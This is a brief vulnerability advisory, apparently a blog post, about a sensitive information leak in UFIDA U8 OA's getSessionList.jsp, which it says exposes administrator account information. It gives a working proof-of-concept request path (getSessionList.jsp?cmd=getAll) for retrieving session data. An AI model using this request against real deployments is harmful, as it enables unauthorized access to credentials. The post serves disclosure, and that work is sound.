Ufida U8 Oa Getsessionlist Jsp Sensitive Information Leakage Vulnerability
Ufida U8 Oa Getsessionlist Jsp Sensitive Information Leakage Vulnerability
UFIDA U8 OA getSessionList.jsp Sensitive Information Leakage Vulnerability
Vulnerability Description
UFIDA U8 OA getSessionList.jsp file, through vulnerability attackers, can obtain the account information of administrators in the database
Vulnerability Impact
UFIDA U8 OA
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/yyoa/ext/https/getSessionList.jsp?cmd=getAll
This post is licensed under CC BY 4.0 by the author.